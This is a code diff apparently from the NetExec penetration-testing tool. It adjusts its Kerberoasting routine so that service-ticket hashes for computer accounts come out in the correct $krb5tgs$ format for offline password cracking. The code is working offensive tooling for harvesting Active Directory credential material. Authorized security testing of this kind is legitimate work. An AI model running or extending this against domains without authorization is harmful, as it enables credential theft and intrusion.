Properly format computer accounts for tgs roasting

Author: NeffIsBack

nxc/protocols/ldap.py

@@ -1067,6 +1067,7 @@ def kerberoasting(self):
             "MemberOf",
             "pwdLastSet",
             "lastLogon",
+            "objectClass",
         ]
         resp = self.search(searchFilter, attributes, 0)
         resp_parsed = parse_result_attributes(resp)
@@ -1111,6 +1112,7 @@ def kerberoasting(self):
                             sessionKey,
                             user["sAMAccountName"],
                             downLevelLogonName,
+                            is_computer="computer" in user.get("objectClass", [])
                         )
 
                         pwdLastSet = "<never>" if str(user.get("pwdLastSet", 0)) == "0" else str(datetime.fromtimestamp(self.getUnixTime(int(user["pwdLastSet"]))))

nxc/protocols/ldap/kerberos.py

@@ -46,7 +46,7 @@ def __init__(self, connection):
         if self.password is None:
             self.password = ""
 
-    def output_tgs(self, tgs, old_session_key, session_key, username, spn, fd=None):
+    def output_tgs(self, tgs, old_session_key, session_key, username, spn, fd=None, is_computer=False):
         decoded_tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
 
         # According to RFC4757 (RC4-HMAC) the cipher part is like:
@@ -69,16 +69,24 @@ def output_tgs(self, tgs, old_session_key, session_key, username, spn, fd=None):
         etype = enc["etype"]
         cipher = enc["cipher"].asOctets()
         realm = decoded_tgs["ticket"]["realm"]
-
         spn_fmt = spn.replace(":", "~")
+
+        # Replace username if it's a computer account
+        if is_computer:
+            account = f"host{username.rstrip('$').lower()}.{str(realm).lower()}"
+        else:
+            if username.endswith("$"):
+                nxc_logger.fail("Account ends with $, but is_computer is False. TGS output is likely to be incorrect.")
+            account = username
+
         if etype in (constants.EncryptionTypes.rc4_hmac.value, constants.EncryptionTypes.des_cbc_md5.value):
             chk = hexlify(cipher[:16]).decode()
             data = hexlify(cipher[16:]).decode()
-            entry = f"$krb5tgs${etype}$*{username}${realm}${spn_fmt}*${chk}${data}"
+            entry = f"$krb5tgs${etype}$*{account}${realm}${spn_fmt}*${chk}${data}"
         elif etype in (constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value):
             chk = hexlify(cipher[-12:]).decode()
             data = hexlify(cipher[:-12]).decode()
-            entry = f"$krb5tgs${etype}${username}${realm}$*{spn_fmt}*${chk}${data}"
+            entry = f"$krb5tgs${etype}${account}${realm}$*{spn_fmt}*${chk}${data}"
         else:
             nxc_logger.fail(f"Skipping {decoded_tgs['ticket']['sname']['name-string'][0]}/{decoded_tgs['ticket']['sname']['name-string'][1]} due to incompatible e-type {decoded_tgs['ticket']['enc-part']['etype']:d}")